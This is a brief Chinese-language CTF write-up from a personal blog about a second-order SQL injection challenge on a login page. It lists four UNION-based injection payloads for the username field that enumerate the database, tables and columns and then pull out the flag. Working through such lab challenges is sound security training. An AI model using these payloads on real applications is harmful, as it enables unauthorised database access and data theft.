CTFTraining october_2019_twice_sqli write-up - Silent's blog

web安全笔记 2020-06-13

CTFTraining october_2019_twice_sqli write-up

（0）

题目就是二次注入，打开是一个登录界面，和[[RCTF2015]EasySQL](https://www.silent666.com/index.php/archives/68/)相似

按照那题的思路在username处进行注入
payload
username =1' union select database() #

username =1' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' #

username =1' union select group_concat(column_name) from information_schema.columns where table_name='flag'#

username =1' union select flag from flag #

估计是这段时间最后一次更新write-up

本文为作者silent666发布，未经允许禁止转载！

上一篇下一篇

评论

暂无评论 >_<

加入评论

热门文章最新文章随机文章

CTFTraining october_2019_twice_sqli write-up

2020-06-13

2009 Views

[GXYCTF2019]BabySQli write-up

2020-06-07

1452 Views

[BJDCTF 2nd]xss之光 write-up

2020-06-12

1177 Views

[GWCTF 2019]我有一个数据库 write-up

2020-06-11

1159 Views

[极客大挑战 2019]HardSQL write-up

2020-06-08

1064 Views

用Docker 搭建squid http代理服务器

2021-11-07

340 Views

crypto项目，资料等

2021-07-23

303 Views

Meson network 一键脚本

2021-06-14

804 Views

2021-06-13

233 Views

parastate节点教程

2021-06-07

521 Views

2020-07-15

514 Views

2021-06-13

233 Views

systemctl及journalctl笔记

2021-05-22

362 Views

2020-06-06

358 Views

记一道有趣的sql注入和我的扩展探索

2020-06-04

620 Views

CTFTraining october_2019_twice_sqli write-up

题目就是二次注入，打开是一个登录界面，和[[RCTF2015...

Silent's blog

Here is my blog,about my coding,about my life.